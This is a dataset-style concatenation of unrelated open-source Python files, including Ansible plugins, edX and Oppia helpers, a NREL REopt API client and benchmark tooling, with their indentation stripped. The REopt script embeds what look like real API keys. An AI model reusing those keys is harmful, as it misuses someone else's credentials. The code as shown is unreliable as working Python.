# - ../files/bar
# - ../files/baz
# ignore_errors: true
from ansible import utils, errors
import os
class LookupModule(object):
def __init__(self, basedir=None, **kwargs):
self.basedir = basedir
def run(self, terms, inject=None, **kwargs):
terms = utils.listify_lookup_plugin_terms(terms, self.basedir, inject)
result = None
anydict = False
skip = False
for term in terms:
if isinstance(term, dict):
anydict = True
total_search = []
if anydict:
for term in terms:
if isinstance(term, dict):
files = term.get('files', [])
paths = term.get('paths', [])
skip = utils.boolean(term.get('skip', False))
filelist = files
if isinstance(files, basestring):
files = files.replace(',', ' ')
files = files.replace(';', ' ')
filelist = files.split(' ')
pathlist = paths
if paths:
if isinstance(paths, basestring):
paths = paths.replace(',', ' ')
paths = paths.replace(':', ' ')
paths = paths.replace(';', ' ')
pathlist = paths.split(' ')
if not pathlist:
total_search = filelist
else:
for path in pathlist:
for fn in filelist:
f = os.path.join(path, fn)
total_search.append(f)
else:
total_search.append(term)
else:
total_search = terms
result = None
for fn in total_search:
path = utils.path_dwim(self.basedir, fn)
if os.path.exists(path):
return [path]
if not result:
if skip:
return []
else:
return [None]
| gpl-3.0 | -4,262,551,166,050,060,300 | 30.834225 | 97 | 0.592642 | false |
hsnlab/mapping | generator/sg_generator.py | 1 | 5884 | #!/usr/bin/python -u
#
# Copyright (c) 2016 Balazs Nemeth
#
# This file is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
Generates requests which can be used as standard test SG-s to cover
most/all functionalities of ESCAPE.
"""
import random
import string
from generator import NFFG
class NameGenerator(object):
def __init__ (self):
self.prefixes = {}
def _get_gen_for_name (self, prefix):
number = 0
while True:
yield prefix + str(number)
number += 1
def get_name (self, prefix):
if prefix in self.prefixes:
return self.prefixes[prefix].next()
else:
self.prefixes[prefix] = self._get_gen_for_name(prefix)
return self.prefixes[prefix].next()
def reset_name (self, prefix):
if prefix in self.prefixes:
del self.prefixes[prefix]
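# Quick sketch of NameGenerator behaviour (the variable name `gen` is illustrative):
# each prefix gets its own generator counting from 0, so names come out
# sequentially numbered per prefix.
#
#   gen = NameGenerator()
#   gen.get_name("nf")    # -> "nf0"
#   gen.get_name("nf")    # -> "nf1"
#   gen.get_name("port")  # -> "port0"
#   gen.reset_name("nf")  # drops the "nf" counter, so the next get_name("nf") is "nf0" again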
def get_8loop_request (abc_nf_types_len=10, seed=0, eightloops=1):
"""
Generates simple request NFFGs in all combinations of sap1-->vnf1-->...-->
vnfn-->sap1. Creates the requests for augmented-dfn-gwin.nffg
:param abc_nf_types_len: number of VNF **Types** (first N uppercase letters) to choose from
:type abc_nf_types_len: int
:param seed: seed for random generator
:type seed: int
:param eightloops: the number of eight loops
:type eightloops: int
:return: an 8loop NFFG
:rtype: :any:`NFFG`
"""
saps = []
for i in xrange(0, 20):
saps.append("sap" + str(i))
rnd = random.Random()
rnd.seed(seed)
gen = NameGenerator()
nffg = NFFG(id="8loops-req")
nffg.mode = NFFG.MODE_ADD
nf_types = list(string.ascii_uppercase)[:abc_nf_types_len]
i = 1
for j in xrange(0, eightloops):
sap = rnd.choice(saps)
if sap not in nffg:
sapo = nffg.add_sap(id=sap, name=sap + "_name")
else:
sapo = nffg.network.node[sap]
if len(sapo.ports) > 0:
for sapp in sapo.ports:
break
else:
sapp = sapo.add_port(id=gen.get_name("port"))
vnfs1 = rnd.sample(nf_types, rnd.randint(1, len(nf_types)))
vnfs2 = rnd.sample(nf_types, rnd.randint(1, len(nf_types)))
nfmiddle = nffg.add_nf(id="nf0" + str(j), name="nf_middle" + str(j),
func_type=rnd.choice(vnfs1),
cpu=1, mem=1, storage=1)
try:
vnfs1.remove(nfmiddle.functional_type)
except ValueError:
pass
try:
vnfs2.remove(nfmiddle.functional_type)
except ValueError:
pass
once = True
for vnf_list in (vnfs1, vnfs2):
nf0 = nfmiddle
for vnf in vnf_list:
nf1 = nffg.add_nf(id="-".join(("nf", str(j), str(i))),
name="nf" + str(i) + "_" + vnf, func_type=vnf,
cpu=1, mem=1, storage=1)
nffg.add_sglink(src_port=nf0.add_port(id=gen.get_name("port")),
dst_port=nf1.add_port(id=gen.get_name("port")),
flowclass="HTTP", id=i)
nf0 = nf1
i += 1
if once:
nffg.add_sglink(src_port=nf0.add_port(id=gen.get_name("port")),
dst_port=nfmiddle.add_port(id=gen.get_name("port")),
flowclass="HTTP", id=i)
once = False
i += 1
nffg.add_sglink(src_port=nf1.add_port(id=gen.get_name("port")),
dst_port=sapp,
flowclass="HTTP", id=i)
nffg.add_sglink(src_port=sapp,
dst_port=nfmiddle.add_port(id=gen.get_name("port")),
flowclass="HTTP", id=i + 1)
i += 2
return nffg
def get_balanced_tree (r=2, h=3, seed=0, max_cpu=4, max_mem=1600,
max_storage=3, max_link_bw=5, min_link_delay=2,
abc_nf_types_len=10, max_link_delay=4):
"""
Gets a balanced tree which has SAPs in the root and the leaves, directed
from the root to the leaves.
:param r: branching factor of the tree
:param h: height of the tree
:return: NFFG
"""
nf_types = list(string.ascii_uppercase)[:abc_nf_types_len]
nffg = NFFG(id="req-tree-branching-" + str(r) + "-height-" + str(h))
nffg.mode = NFFG.MODE_ADD
rnd = random.Random()
rnd.seed(seed)
gen = NameGenerator()
sap_obj = nffg.add_sap(id=gen.get_name("sap"))
prev_level_nf_ports = [sap_obj.add_port(id=gen.get_name("port"))]
for level in xrange(0, h):
curr_level_nf_ports = []
for prev_level_port in prev_level_nf_ports:
for j in xrange(0, r):
nf = nffg.add_nf(id=gen.get_name("nf"), func_type=rnd.choice(nf_types),
cpu=rnd.random() * max_cpu,
mem=rnd.random() * max_mem,
storage=rnd.random() * max_storage)
nffg.add_sglink(prev_level_port, nf.add_port(gen.get_name("port")),
id=gen.get_name("sghop"))
curr_level_nf_ports.append(nf.add_port(gen.get_name("port")))
prev_level_nf_ports = curr_level_nf_ports
for port in prev_level_nf_ports:
sap = nffg.add_sap(id=gen.get_name("sap"))
nffg.add_sglink(port, sap.add_port(id=gen.get_name("port")),
id=gen.get_name("delay_sghop"),
delay=rnd.uniform(min_link_delay, max_link_delay),
bandwidth=rnd.random() * max_link_bw)
return nffg
if __name__ == '__main__':
# nffg = get_8loop_request(eightloops=3)
nffg = get_balanced_tree(r=2, h=2)
print nffg.dump()
| apache-2.0 | -6,003,011,394,337,642,000 | 32.816092 | 79 | 0.599422 | false |
dpinney/omf | omf/solvers/REopt/post_and_poll.py | 1 | 1120 | import requests
import json
from logger import log
from results_poller import poller
results_file = 'results.json'
API_KEY = 'WhEzm6QQQrks1hcsdN0Vrd56ZJmUyXJxTJFg6pn9' # REPLACE WITH YOUR API KEY
# API_KEY = 'Y8GMAFsqcPtxhjIa1qfNj5ILxN5DH5cjV3i6BeNE'
root_url = 'https://developer.nrel.gov/api/reopt'
post_url = root_url + '/v1/job/?api_key=' + API_KEY
results_url = root_url + '/v1/job/<run_uuid>/results/?api_key=' + API_KEY
post = json.load(open('Scenario_test_POST.json'))
resp = requests.post(post_url, json=post)
if not resp.ok:
log.error("Status code {}. {}".format(resp.status_code, resp.content))
else:
log.info("Response OK from {}.".format(post_url))
run_id_dict = json.loads(resp.text)
try:
run_id = run_id_dict['run_uuid']
except KeyError:
msg = "Response from {} did not contain run_uuid.".format(post_url)
log.error(msg)
raise KeyError(msg)
results = poller(url=results_url.replace('<run_uuid>', run_id))
with open(results_file, 'w') as fp:
json.dump(obj=results, fp=fp)
log.info("Saved results to {}".format(results_file))
| gpl-2.0 | -2,044,019,572,903,973,600 | 31 | 81 | 0.674107 | false |
MaximLich/oppia | main_taskqueue.py | 11 | 1803 | # Copyright 2016 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main package for URL routing for requests originating from the task queue."""
# pylint: disable=relative-import
from core.controllers import tasks
from core.platform import models
import feconf
import main
# pylint: enable=relative-import
import webapp2
transaction_services = models.Registry.import_transaction_services()
# Register the URLs with the classes responsible for handling them.
URLS = [
main.get_redirect_route(
r'%s' % feconf.TASK_URL_FEEDBACK_MESSAGE_EMAILS,
tasks.UnsentFeedbackEmailHandler),
main.get_redirect_route(
r'%s' % feconf.TASK_URL_SUGGESTION_EMAILS,
tasks.SuggestionEmailHandler),
main.get_redirect_route(
r'%s' % feconf.TASK_URL_FLAG_EXPLORATION_EMAILS,
tasks.FlagExplorationEmailHandler),
main.get_redirect_route(
r'%s' % feconf.TASK_URL_INSTANT_FEEDBACK_EMAILS,
tasks.InstantFeedbackMessageEmailHandler),
main.get_redirect_route(
r'%s' % feconf.TASK_URL_FEEDBACK_STATUS_EMAILS,
tasks.FeedbackThreadStatusChangeEmailHandler),
]
app = transaction_services.toplevel_wrapper( # pylint: disable=invalid-name
webapp2.WSGIApplication(URLS, debug=feconf.DEBUG))
| apache-2.0 | 6,589,000,064,213,346,000 | 35.795918 | 80 | 0.740433 | false |
CptDemocracy/Python | MITx-6.00.1x-EDX-Introduction-to-Computer-Science/Week-3/Lecture-5/problem3.py | 1 | 1417 | """
Problem 3.
The function recurPower(base, exp) from Problem 2 computed base^exp
by decomposing the problem into one recursive case and one base case:
base^exp = base * base^(exp - 1) if exp > 0
base^exp = 1 if exp = 0
Another way to solve this problem just using multiplication
(and remainder) is to note that:
base^exp = (base^2)^(exp/2) if exp > 0 and exp is even
base^exp = base * base^(exp - 1) if exp > 0 and exp is odd
base^exp = 1 if exp = 0
Write a procedure recurPowerNew which recursively computes
exponentials using this idea.
"""
def sign(n):
if n > 0:
return 1
elif n < 0:
return -1
else:
return 0
def recurPowerNew(base, exp):
'''
base: int or float.
exp: int >= 0
returns: int or float; base^exp
'''
if exp == 0:
return 1.0
if exp == 1:
return base
expSign = sign(exp)
if abs(exp) > 1:
if abs(exp) % 2 == 0:
if expSign > 0:
return recurPowerNew(base * base, abs(exp) / 2.0)
else:
return 1.0 / (recurPowerNew(base * base, abs(exp) / 2.0))
elif abs(exp) % 2 == 1:
if expSign > 0:
return base * recurPowerNew(base, abs(exp) - 1)
else:
return 1.0 / (base * recurPowerNew(base, abs(exp) - 1))
return -1.0
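# A few illustrative sanity checks (not part of the original assignment):
#   recurPowerNew(2, 0)  -> 1.0    (base case)
#   recurPowerNew(2, 10) -> 1024   (even-exponent path)
#   recurPowerNew(2, -2) -> 0.25   (negative exponents handled via the reciprocal)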
| mit | -3,404,950,140,497,356,000 | 26.25 | 73 | 0.539873 | false |
martynovp/edx-platform | common/djangoapps/student/helpers.py | 2 | 10810 | """Helpers for the student app. """
import time
from datetime import datetime
import urllib
from pytz import UTC
from django.utils.http import cookie_date
from django.conf import settings
from django.core.urlresolvers import reverse, NoReverseMatch
import third_party_auth
from verify_student.models import SoftwareSecurePhotoVerification # pylint: disable=F0401
from course_modes.models import CourseMode
# Enumeration of per-course verification statuses
# we display on the student dashboard.
VERIFY_STATUS_NEED_TO_VERIFY = "verify_need_to_verify"
VERIFY_STATUS_SUBMITTED = "verify_submitted"
VERIFY_STATUS_APPROVED = "verify_approved"
VERIFY_STATUS_MISSED_DEADLINE = "verify_missed_deadline"
VERIFY_STATUS_NEED_TO_REVERIFY = "verify_need_to_reverify"
def check_verify_status_by_course(user, course_enrollments, all_course_modes):
"""
Determine the per-course verification statuses for a given user.
The possible statuses are:
* VERIFY_STATUS_NEED_TO_VERIFY: The student has not yet submitted photos for verification.
* VERIFY_STATUS_SUBMITTED: The student has submitted photos for verification,
but has not yet been approved.
* VERIFY_STATUS_APPROVED: The student has been successfully verified.
* VERIFY_STATUS_MISSED_DEADLINE: The student did not submit photos within the course's deadline.
* VERIFY_STATUS_NEED_TO_REVERIFY: The student has an active verification, but it is
set to expire before the verification deadline for the course.
It is also possible that a course does NOT have a verification status if:
* The user is not enrolled in a verified mode, meaning that the user didn't pay.
* The course does not offer a verified mode.
* The user submitted photos but an error occurred while verifying them.
* The user submitted photos but the verification was denied.
In the last two cases, we rely on messages in the sidebar rather than displaying
messages for each course.
Arguments:
user (User): The currently logged-in user.
course_enrollments (list[CourseEnrollment]): The courses the user is enrolled in.
all_course_modes (list): List of all course modes for the student's enrolled courses,
including modes that have expired.
Returns:
dict: Mapping of course keys to verification status dictionaries.
If no verification status is applicable to a course, it will not
be included in the dictionary.
The dictionaries have these keys:
* status (str): One of the enumerated status codes.
* days_until_deadline (int): Number of days until the verification deadline.
* verification_good_until (str): Date string for the verification expiration date.
"""
status_by_course = {}
# Retrieve all verifications for the user, sorted in descending
# order by submission datetime
verifications = SoftwareSecurePhotoVerification.objects.filter(user=user)
# Check whether the user has an active or pending verification attempt
# To avoid another database hit, we re-use the queryset we have already retrieved.
has_active_or_pending = SoftwareSecurePhotoVerification.user_has_valid_or_pending(
user, queryset=verifications
)
recent_verification_datetime = None
for enrollment in course_enrollments:
# Get the verified mode (if any) for this course
# We pass in the course modes we have already loaded to avoid
# another database hit, as well as to ensure that expired
# course modes are included in the search.
verified_mode = CourseMode.verified_mode_for_course(
enrollment.course_id,
modes=all_course_modes[enrollment.course_id]
)
# If no verified mode has ever been offered, or the user hasn't enrolled
# as verified, then the course won't display state related to its
# verification status.
if verified_mode is not None and enrollment.mode in CourseMode.VERIFIED_MODES:
deadline = verified_mode.expiration_datetime
relevant_verification = SoftwareSecurePhotoVerification.verification_for_datetime(deadline, verifications)
# Picking the max verification datetime on each iteration only with approved status
if relevant_verification is not None and relevant_verification.status == "approved":
recent_verification_datetime = max(
recent_verification_datetime if recent_verification_datetime is not None
else relevant_verification.expiration_datetime,
relevant_verification.expiration_datetime
)
# By default, don't show any status related to verification
status = None
# Check whether the user was approved or is awaiting approval
if relevant_verification is not None:
if relevant_verification.status == "approved":
status = VERIFY_STATUS_APPROVED
elif relevant_verification.status == "submitted":
status = VERIFY_STATUS_SUBMITTED
# If the user didn't submit at all, then tell them they need to verify
# If the deadline has already passed, then tell them they missed it.
# If they submitted but something went wrong (error or denied),
# then don't show any messaging next to the course, since we already
# show messages related to this on the left sidebar.
submitted = (
relevant_verification is not None and
relevant_verification.status not in ["created", "ready"]
)
if status is None and not submitted:
if deadline is None or deadline > datetime.now(UTC):
if has_active_or_pending:
# The user has an active verification, but the verification
# is set to expire before the deadline. Tell the student
# to reverify.
status = VERIFY_STATUS_NEED_TO_REVERIFY
else:
status = VERIFY_STATUS_NEED_TO_VERIFY
else:
# If a user currently has an active or pending verification,
# then they may have submitted an additional attempt after
# the verification deadline passed. This can occur,
# for example, when the support team asks a student
# to reverify after the deadline so they can receive
# a verified certificate.
# In this case, we still want to show them as "verified"
# on the dashboard.
if has_active_or_pending:
status = VERIFY_STATUS_APPROVED
# Otherwise, the student missed the deadline, so show
# them as "honor" (the kind of certificate they will receive).
else:
status = VERIFY_STATUS_MISSED_DEADLINE
# Set the status for the course only if we're displaying some kind of message
# Otherwise, leave the course out of the dictionary.
if status is not None:
days_until_deadline = None
now = datetime.now(UTC)
if deadline is not None and deadline > now:
days_until_deadline = (deadline - now).days
status_by_course[enrollment.course_id] = {
'status': status,
'days_until_deadline': days_until_deadline
}
if recent_verification_datetime:
for key, value in status_by_course.iteritems(): # pylint: disable=unused-variable
status_by_course[key]['verification_good_until'] = recent_verification_datetime.strftime("%m/%d/%Y")
return status_by_course
def auth_pipeline_urls(auth_entry, redirect_url=None):
"""Retrieve URLs for each enabled third-party auth provider.
These URLs are used on the "sign up" and "sign in" buttons
on the login/registration forms to allow users to begin
authentication with a third-party provider.
Optionally, we can redirect the user to an arbitrary
url after auth completes successfully. We use this
to redirect the user to a page that required login,
or to send users to the payment flow when enrolling
in a course.
Args:
auth_entry (string): Either `pipeline.AUTH_ENTRY_LOGIN` or `pipeline.AUTH_ENTRY_REGISTER`
Keyword Args:
redirect_url (unicode): If provided, send users to this URL
after they successfully authenticate.
Returns:
dict mapping provider IDs to URLs
"""
if not third_party_auth.is_enabled():
return {}
return {
provider.provider_id: third_party_auth.pipeline.get_login_url(
provider.provider_id, auth_entry, redirect_url=redirect_url
) for provider in third_party_auth.provider.Registry.enabled()
}
# Query string parameters that can be passed to the "finish_auth" view to manage
# things like auto-enrollment.
POST_AUTH_PARAMS = ('course_id', 'enrollment_action', 'course_mode', 'email_opt_in')
def get_next_url_for_login_page(request):
"""
Determine the URL to redirect to following login/registration/third_party_auth
The user is currently on a login or registration page.
If 'course_id' or any of the other POST_AUTH_PARAMS are set, we will need to send the user to the
/account/finish_auth/ view following login, which will take care of auto-enrollment in
the specified course.
Otherwise, we go to the ?next= query param or to the dashboard if nothing else is
specified.
"""
redirect_to = request.GET.get('next', None)
if not redirect_to:
try:
redirect_to = reverse('dashboard')
except NoReverseMatch:
redirect_to = reverse('home')
if any(param in request.GET for param in POST_AUTH_PARAMS):
# Before we redirect to next/dashboard, we need to handle auto-enrollment:
params = [(param, request.GET[param]) for param in POST_AUTH_PARAMS if param in request.GET]
params.append(('next', redirect_to)) # After auto-enrollment, user will be sent to payment page or to this URL
redirect_to = '{}?{}'.format(reverse('finish_auth'), urllib.urlencode(params))
# Note: if we are resuming a third party auth pipeline, then the next URL will already
# be saved in the session as part of the pipeline state. That URL will take priority
# over this one.
return redirect_to
| agpl-3.0 | 7,328,953,190,709,362,000 | 44.805085 | 119 | 0.654209 | false |
CartesianCo/argentum-control | src/simcon.py | 2 | 1786 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Argentum Control GUI
Copyright (C) 2013 Isabella Stevens
Copyright (C) 2014 Michael Shiel
Copyright (C) 2015 Trent Waddington
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from controllers import ParsingControllerBase
from CartesianCo import ArgentumEmulator
class SimulatorController(ParsingControllerBase):
def __init__(self):
self.printer = ArgentumEmulator(None, None)
def incrementalMovementCommand(self, axis, steps):
print(self.printer.currentPosition)
#print('incrementalMovementCommand on {} axis for {} steps.'.format(axis, steps))
if axis == 'X':
if steps == 0:
self.printer.moveToX(0)
else:
self.printer.incrementX(xIncrement=steps)
if axis == 'Y':
if steps == 0:
self.printer.moveToY(0)
else:
self.printer.incrementY(yIncrement=steps)
def firingCommand(self, primitives1, address1, primitives2, address2):
print('firingCommand on primitives {}-{} and address {}.'.format(primitives1, primitives2, address1))
pass
| gpl-3.0 | 6,288,955,210,944,737,000 | 35.44898 | 109 | 0.671333 | false |
simbuerg/benchbuild | benchbuild/projects/gentoo/portage_gen.py | 1 | 4310 | """
Generic experiment to test portage packages within gentoo chroot.
"""
import logging
import os
from benchbuild.projects.gentoo import autoportage
from benchbuild.utils.run import run, uchroot_no_args
from benchbuild.utils.container import Gentoo
from plumbum import local, ProcessExecutionError
def PortageFactory(name, NAME, DOMAIN, BaseClass=autoportage.AutoPortage):
"""
Create a new dynamic portage project.
Auto-Generated projects can only be used for compile-time experiments,
because there simply is no run-time test defined for it. Therefore,
we implement the run symbol as a noop (with minor logging).
This way we avoid the default implementation for run() that all projects
inherit.
Args:
name: Name of the dynamic class.
NAME: NAME property of the dynamic class.
DOMAIN: DOMAIN property of the dynamic class.
BaseClass: Base class to use for the dynamic class.
Returns:
A new class with NAME,DOMAIN properties set, unable to perform
run-time tests.
Examples:
>>> from benchbuild.projects.gentoo.portage_gen import PortageFactory
>>> from benchbuild.experiments.empty import Empty
>>> c = PortageFactory("test", "NAME", "DOMAIN")
>>> c
<class '__main__.test'>
>>> i = c(Empty())
>>> i.NAME
'NAME'
>>> i.DOMAIN
'DOMAIN'
"""
#pylint: disable=too-few-public-methods
class FuncClass(object):
"""
Finds out the current version number of a gentoo package.
The package name is created by combining the domain and the name.
Then uchroot is used to switch into a gentoo shell where the 'emerge'
command is used to retrieve the version number.
The function then parses the version number out of the emerge output and returns it.
Args:
Name: Name of the project.
Domain: Category of the package.
"""
def __init__(self, name, domain, container):
self.name = name
self.domain = domain
self.container = container
def __repr__(self):
return self.__str__()
def __str__(self):
try:
domain, _, name = self.name.partition("_")
package = domain + '/' + name
container = self.container()
uchroot = uchroot_no_args()
uchroot = uchroot["-E", "-A", "-C", "-w", "/", "-r"]
uchroot = uchroot[container.local]
with local.env(CONFIG_PROTECT="-*"):
fake_emerge = uchroot["emerge",
"--autounmask-only=y",
"--autounmask-write=y",
"--nodeps"]
run(fake_emerge[package])
emerge_in_chroot = uchroot["emerge",
"-p",
"--nodeps",
package]
_, stdout, _ = emerge_in_chroot.run()
for line in stdout.split('\n'):
if package in line:
_, _, package_name = line.partition("/")
_, name, version = package_name.partition(name)
version, _, _ = version.partition(" ")
return version[1:]
except ProcessExecutionError:
logger = logging.getLogger(__name__)
logger.info("This older package might not exist any more.")
return "Default"
def run_not_supported(self, *args, **kwargs): # pylint: disable=W0613
"""Dynamic projects don't support a run() test."""
from benchbuild.settings import CFG
logger = logging.getLogger(__name__)
logger.info("run() not supported.")
if CFG["clean"].value():
self.clean()
return
newclass = type(name, (BaseClass,), {
"NAME": NAME,
"DOMAIN": DOMAIN,
"SRC_FILE": "none",
"VERSION": FuncClass(NAME, DOMAIN, Gentoo),
"GROUP": "auto-gentoo",
"run": run_not_supported,
"__module__": "__main__"
})
return newclass
| mit | 8,436,380,484,041,424,000 | 34.619835 | 77 | 0.535731 | false |
victorlin/ansible-docker-hellobaby | setup.py | 1 | 1061 | import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'README.txt')) as f:
README = f.read()
with open(os.path.join(here, 'CHANGES.txt')) as f:
CHANGES = f.read()
requires = [
'pyramid',
'pyramid_chameleon',
'pyramid_debugtoolbar',
'waitress',
]
setup(name='hellobaby',
version='0.0',
description='hellobaby',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pyramid",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='',
author_email='',
url='',
keywords='web pyramid pylons',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=requires,
tests_require=requires,
test_suite="hellobaby",
entry_points="""\
[paste.app_factory]
main = hellobaby:main
""",
)
| mit | 3,099,108,538,728,659,000 | 24.261905 | 63 | 0.579642 | false |
HyperBaton/ansible | lib/ansible/module_utils/vca.py | 38 | 11383 | #
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
import os
import traceback
PYVCLOUD_IMP_ERR = None
try:
from pyvcloud.vcloudair import VCA
HAS_PYVCLOUD = True
except ImportError:
PYVCLOUD_IMP_ERR = traceback.format_exc()
HAS_PYVCLOUD = False
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
SERVICE_MAP = {'vca': 'ondemand', 'vchs': 'subscription', 'vcd': 'vcd'}
LOGIN_HOST = {'vca': 'vca.vmware.com', 'vchs': 'vchs.vmware.com'}
DEFAULT_SERVICE_TYPE = 'vca'
DEFAULT_VERSION = '5.7'
class VcaError(Exception):
def __init__(self, msg, **kwargs):
self.kwargs = kwargs
super(VcaError, self).__init__(msg)
def vca_argument_spec():
return dict(
username=dict(type='str', aliases=['user'], required=True),
password=dict(type='str', aliases=['pass', 'passwd'], required=True, no_log=True),
org=dict(),
service_id=dict(),
instance_id=dict(),
host=dict(),
api_version=dict(default=DEFAULT_VERSION),
service_type=dict(default=DEFAULT_SERVICE_TYPE, choices=SERVICE_MAP.keys()),
vdc_name=dict(),
gateway_name=dict(default='gateway'),
validate_certs=dict(type='bool', default=True, aliases=['verify_certs'])
)
class VcaAnsibleModule(AnsibleModule):
def __init__(self, *args, **kwargs):
argument_spec = vca_argument_spec()
argument_spec.update(kwargs.get('argument_spec', dict()))
kwargs['argument_spec'] = argument_spec
super(VcaAnsibleModule, self).__init__(*args, **kwargs)
if not HAS_PYVCLOUD:
self.fail(missing_required_lib('pyvcloud'),
exception=PYVCLOUD_IMP_ERR)
self._vca = self.create_instance()
self.login()
self._gateway = None
self._vdc = None
@property
def vca(self):
return self._vca
@property
def gateway(self):
if self._gateway is not None:
return self._gateway
vdc_name = self.params['vdc_name']
gateway_name = self.params['gateway_name']
_gateway = self.vca.get_gateway(vdc_name, gateway_name)
if not _gateway:
raise VcaError('vca instance has no gateway named %s' % gateway_name)
self._gateway = _gateway
return _gateway
@property
def vdc(self):
if self._vdc is not None:
return self._vdc
vdc_name = self.params['vdc_name']
_vdc = self.vca.get_vdc(vdc_name)
if not _vdc:
raise VcaError('vca instance has no vdc named %s' % vdc_name)
self._vdc = _vdc
return _vdc
def get_vapp(self, vapp_name):
vapp = self.vca.get_vapp(self.vdc, vapp_name)
if not vapp:
raise VcaError('vca instance has no vapp named %s' % vapp_name)
return vapp
def get_vm(self, vapp_name, vm_name):
vapp = self.get_vapp(vapp_name)
children = vapp.me.get_Children()
vms = [vm for vm in children.get_Vm() if vm.name == vm_name]
try:
return vms[0]
except IndexError:
raise VcaError('vapp has no vm named %s' % vm_name)
def create_instance(self):
service_type = self.params.get('service_type', DEFAULT_SERVICE_TYPE)
if service_type == 'vcd':
host = self.params['host']
else:
host = LOGIN_HOST[service_type]
username = self.params['username']
version = self.params.get('api_version')
if service_type == 'vchs':
version = '5.6'
verify = self.params.get('validate_certs')
return VCA(host=host, username=username,
service_type=SERVICE_MAP[service_type],
version=version, verify=verify)
def login(self):
service_type = self.params['service_type']
password = self.params['password']
login_org = None
if service_type == 'vcd':
login_org = self.params['org']
if not self.vca.login(password=password, org=login_org):
self.fail('Login to VCA failed', response=self.vca.response.content)
try:
method_name = 'login_%s' % service_type
meth = getattr(self, method_name)
meth()
except AttributeError:
self.fail('no login method exists for service_type %s' % service_type)
except VcaError as e:
self.fail(e.message, response=self.vca.response.content, **e.kwargs)
def login_vca(self):
instance_id = self.params['instance_id']
if not instance_id:
raise VcaError('missing required instance_id for service_type vca')
self.vca.login_to_instance_sso(instance=instance_id)
def login_vchs(self):
service_id = self.params['service_id']
if not service_id:
raise VcaError('missing required service_id for service_type vchs')
org = self.params['org']
if not org:
raise VcaError('missing required org for service_type vchs')
self.vca.login_to_org(service_id, org)
def login_vcd(self):
org = self.params['org']
if not org:
raise VcaError('missing required org for service_type vcd')
if not self.vca.token:
raise VcaError('unable to get token for service_type vcd')
if not self.vca.vcloud_session.org_url:
raise VcaError('unable to get org_url for service_type vcd')
self.vca.login(token=self.vca.token, org=org,
org_url=self.vca.vcloud_session.org_url)
def save_services_config(self, blocking=True):
task = self.gateway.save_services_configuration()
if not task:
self.fail(msg='unable to save gateway services configuration')
if blocking:
self.vca.block_until_completed(task)
def fail(self, msg, **kwargs):
self.fail_json(msg=msg, **kwargs)
def exit(self, **kwargs):
self.exit_json(**kwargs)
# -------------------------------------------------------------
# 9/18/2015 @privateip
# All of the functions below here were migrated from the original
# vca_* modules. All functions below should be considered deprecated
# and will be removed once all of the vca_* modules have been updated
# to use the new instance module above
# -------------------------------------------------------------
VCA_REQ_ARGS = ['instance_id', 'vdc_name']
VCHS_REQ_ARGS = ['service_id']
VCD_REQ_ARGS = []
def _validate_module(module):
if not HAS_PYVCLOUD:
module.fail_json(msg=missing_required_lib("pyvcloud"),
exception=PYVCLOUD_IMP_ERR)
service_type = module.params.get('service_type', DEFAULT_SERVICE_TYPE)
if service_type == 'vca':
for arg in VCA_REQ_ARGS:
if module.params.get(arg) is None:
module.fail_json(msg="argument %s is mandatory when service type "
"is vca" % arg)
if service_type == 'vchs':
for arg in VCHS_REQ_ARGS:
if module.params.get(arg) is None:
module.fail_json(msg="argument %s is mandatory when service type "
"is vchs" % arg)
if service_type == 'vcd':
for arg in VCD_REQ_ARGS:
if module.params.get(arg) is None:
module.fail_json(msg="argument %s is mandatory when service type "
"is vcd" % arg)
def serialize_instances(instance_list):
instances = []
for i in instance_list:
instances.append(dict(apiUrl=i['apiUrl'], instance_id=i['id']))
return instances
def _vca_login(vca, password, instance):
if not vca.login(password=password):
raise VcaError("Login Failed: Please check username or password",
error=vca.response.content)
if not vca.login_to_instance_sso(instance=instance):
s_json = serialize_instances(vca.instances)
raise VcaError("Login to Instance failed: Seems like instance_id provided "
"is wrong .. Please check", valid_instances=s_json)
return vca
def _vchs_login(vca, password, service, org):
if not vca.login(password=password):
raise VcaError("Login Failed: Please check username or password",
error=vca.response.content)
if not vca.login_to_org(service, org):
raise VcaError("Failed to login to org, Please check the orgname",
error=vca.response.content)
def _vcd_login(vca, password, org):
# TODO: this function needs to be refactored
if not vca.login(password=password, org=org):
raise VcaError("Login Failed: Please check username or password "
"or host parameters")
if not vca.login(password=password, org=org):
raise VcaError("Failed to get the token",
error=vca.response.content)
